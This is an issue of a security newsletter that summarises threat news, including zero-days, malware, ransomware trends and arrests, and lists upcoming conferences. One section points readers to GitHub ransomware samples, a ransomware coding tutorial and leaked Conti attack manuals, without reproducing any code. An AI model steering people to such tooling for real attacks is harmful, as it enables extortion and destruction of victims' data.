Securing, maintaining compliance, and ensuring the availability of your organization’s critical data are daily priorities, alongside managing user requests and permissions.

Protecting Salesforce data shouldn't be time-consuming or complicated.

Here’s why:

Learn about common challenges admins face in safeguarding Salesforce data, including accidental deletions, cyber threats, and compliance audits

Welcome to another_secpro!

Let's cut to the chase: the Microsoft Digital Defense Report 2024 is out and we're playing catch up to get up to scratch on all the important need-to-knows, what-to-learns, and why-to-panics. (Alright, not really on that last one there.)

Make sure to pick up your copy for free and tell us what you think of it because we'll be releasing our comments, thoughts, and reflections in a special issue next week and our end-of-the-month premium issue as well. Don't miss out!

As always, make sure to check out the templates, podcasts, and other stuff on ourSubstackand access the very best that we have to offer. You might even learn something!

Cheers!
Austin Miller
Editor-in-Chief

AhnLab - AhnLab and NCSC Release Joint Report on Microsoft Zero-Day Browser Vulnerability: “AhnLab SEcurity intelligence Center (ASEC) and the National Cyber Security Center (NCSC) have discovered a new zero-day vulnerability in the Microsoft Internet Explorer (IE) browser and have conducted a detailed analysis on attacks that exploit this vulnerability. This post shares the joint analysis report “Operation Code on Toast by TA-RedAnt” which details the findings of the ASEC and NCSC joint analysis and the responses to the threat.”

Bruce Schneier-More Details on Israel Sabotaging Hezbollah Pagers and Walkie-Talkies: The Washington Post has a long and detailed story about the operation that’s well worth reading (alternate version here): "The sales pitch came from a marketing official trusted by Hezbollah with links to Apollo. The marketing official, a woman whose identity and nationality officials declined to reveal, was a former Middle East sales representative for the Taiwanese firm who had established her own company and acquired a license to sell a line of pagers that bore the Apollo brand. Sometime in 2023, she offered Hezbollah a deal on one of the products her firm sold: the rugged and reliable AR924."

Bruce Schneier-Perfectl Malware: “Perfectl in an impressive piece of malware”: The malware has been circulating since at least 2021. It gets installed by exploiting more than 20,000 common misconfigurations, a capability that may make millions of machines connected to the Internet potential targets, researchers from Aqua Security said. It can also exploit CVE-2023-33246, a vulnerability with a severity rating of 10 out of 10 that was patched last year in Apache RocketMQ, a messaging and streaming platform that’s found on many Linux machines.

Bruce Schneier-IronNet Has Shut Down: “After retiring in 2014 from an uncharacteristically long tenure running the NSA (and US CyberCommand), Keith Alexander founded a cybersecurity company called IronNet. At the time, he claimed that it was based on IP he developed on his own time while still in the military. That always troubled me. Whatever ideas he had, they were developed on public time using public resources: he shouldn’t have been able to leave military service with them in his back pocket. In any case, it was never clear what those ideas were… Turns out there was nothing there. After some crazy VC investments and an IPO with a $3 billion “unicorn” valuation, the company has shut its doors. It went bankrupt a year ago—ceasing operations and firing everybody—and reemerged as a private company. It now seems to be gone for good, not having found anyone willing to buy it.

Google Cloud - How Low Can You Go? An Analysis of 2023 Time-to-Exploit Trends: “Mandiant analyzed 138 vulnerabilities that were disclosed in 2023 and that we tracked as exploited in the wild. Consistent with past analyses, the majority (97) of these vulnerabilities were exploited as zero-days (vulnerabilities exploited before patches are made available, excluding end-of-life technologies). Forty-one vulnerabilities were exploited as n-days (vulnerabilities first exploited after patches are available). While we have previously seen and continue to expect a growing use of zero-days over time, 2023 saw an even larger discrepancy grow between zero-day and n-day exploitation as zero-day exploitation outpaced n-day exploitation more heavily than we have previously observed.”

Krebs on Security - Sudanese Brothers Arrested in ‘AnonSudan’ Takedown: “The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites, and cloud providers. The younger brother is facing charges that could land him life in prison for allegedly seeking to kill people with his attacks.”

Microsoft Threat Intelligence - Microsoft Digital Defense Report 2024: “In the last year, the cyber threat landscape continued to become more dangerous and complex. The malign actors of the world are becoming better resourced and better prepared, with increasingly sophisticated tactics, techniques, and tools that challenge even the world’s best cybersecurity defenders. Even Microsoft has been the victim of well-orchestrated attacks by determined and well-resourced adversaries, and our customers face more than 600 million cybercriminal and nation-state attacks every day, ranging from ransomware to phishing to identity attacks.”

Microsoft Threat Intelligence - New macOS vulnerability, “HM Surf”, could lead to unauthorized data access: “Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf” [Editor: with apparently no intention of making a Pokemon reference…], involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent.”

Sekoia - ClickFix tactic: The Phantom Meet: In May 2024, a new social engineering tactic called ClickFix emerged, featuring a ClearFake cluster that the Sekoia Threat Detection & Research (TDR) team closely monitored and analysed in a private report entitled FLINT 2024-027 – New widespread ClearFake variant abuses PowerShell and clipboard… In recent months, multiple malware distribution campaigns have leveraged the ClickFix lure to spread Windows and macOS infostealers, botnets, and remote access tools. This is in line with the growing, ongoing trend of distributing malware through the drive-by download technique. Sekoia analysts assess that several intrusion sets recently adopted this tactic, presumably to evade antivirus software scanning and browser security features, aiming to improve attackers’ infection rates.

Tech Informed - Ransomware threats surge with over 30 new groups this year: The number of active ransomware threat groups has risen by a third in the past year, according to cyber security firm Secureworks, with 31 new groups having entered the ransomware ecosystem. In its latest ‘State of The Threat’ report, Secureworks examined cyber risk activity from June 2023 to June 2024, with proof that ransomware risk is still high despite the takedown of large gangs such as LockBit. Despite its highly publicised takedown, LockBit remains at the top of the list of most active groups. It accounted for 17% of listings this year, down from 8% last year.

goliate/hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes. Simples.

ncorbuk/Python-Ransomware - A Python Ransomware Tutorial with a YouTube tutorial explaining code and showcasing the ransomware with victim/target roles.

ForbiddenProgrammer/conti-pentester-guide-leak: Leaked pentesting manuals given to Conti ransomware crooks.

codesiddhant/Jasmin-Ransomware: Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks. Jasmin helps security researchers to overcome the risk of external attacks.

ISC2 Security Congress 2024(October 14th): "ISC2 Security Congress is just around the corner! Join thousands of cybersecurity experts from across the globe as we lead the charge against emerging threats and protect what matters most in today's digital landscape. Regular Pricing has been extended just for you! Register today and save $200."

Exploring the 2024 Horizon Report | Cybersecurity and Privacy Edition(October 15th): This webinar will explore the trends, challenges, and key technology developments identified by a panel of experts in the 2024 Horizon Report | Cybersecurity and Privacy Edition. Members of the Horizon Report team and panel will highlight contextual trends and challenges and discuss how key technologies can assist higher education cybersecurity and privacy professionals in meeting challenges and capitalizing on opportunities for the future. Implications of trends and key technologies will be considered from different institutional perspectives.

The Impact of Generative AI on Kids’ Privacy, Safety, and Security(October 15th): In our increasingly digital world, the boundaries of our expectations related to privacy, security and online safety are stretched more and more by emerging technologies, policies, and practices. The Future of Privacy Forum, AARNet, and the Australian Strategic Policy Institute (ASPI) invite you to the second in our event series on privacy, security, and online safety of young people in Australia. This session will focus on potential risks and benefits related to children’s use of the growing suite of generative AI tools and methods for combatting existing and emerging harms to young people online, including the impact of the upcoming updates to Australia’s Privacy Act and the ongoing work of various Australian digital platform regulators on generative AI and AI governance.

Red Hat Summit: Connect 2024(October 15th, 17th, & 22nd): Red Hat® Summit: Connect is coming to cities across Asia Pacific. Join us as we explore the future of Al, hybrid cloud, open source technology, and IT. With plenty of opportunities to engage during sessions, demos, and networking, this year's in-person event will give you access to Red Hat experts and industry leaders- all at no cost.

BSidesNYC Conference(October 19th): BSidesNYC is an information security conference coordinated by security professionals within the tri-state area as part of the larger BSides framework. The conference prides itself on building an environment focused on technical content covering various security topics - from offensive security to digital forensics and incident response.

SecTor(October 23rd-26th): SecTor is renowned for bringing together international experts to discuss underground threats and corporate defenses. This cyber security conference offers a unique opportunity for IT security professionals, managers, and executives to connect and learn from experienced mentors. This year, SecTor introduces the ‘Certified Pentester’ program, including a full-day practical examination, adding to the event’s educational offerings.

LASCON 2024(October 24-25th): The Lonestar Application Security Conference (LASCON) is an annual event in Austin, TX, associated with OWASP, gathering 400+ web app developers, security engineers, mobile developers, and infosec professionals. Being in Texas, home to numerous Fortune 500 companies, and located in Austin, a startup hub, LASCON attracts leaders, security architects, and developers to share innovative ideas, initiatives, and technology advancements in application security.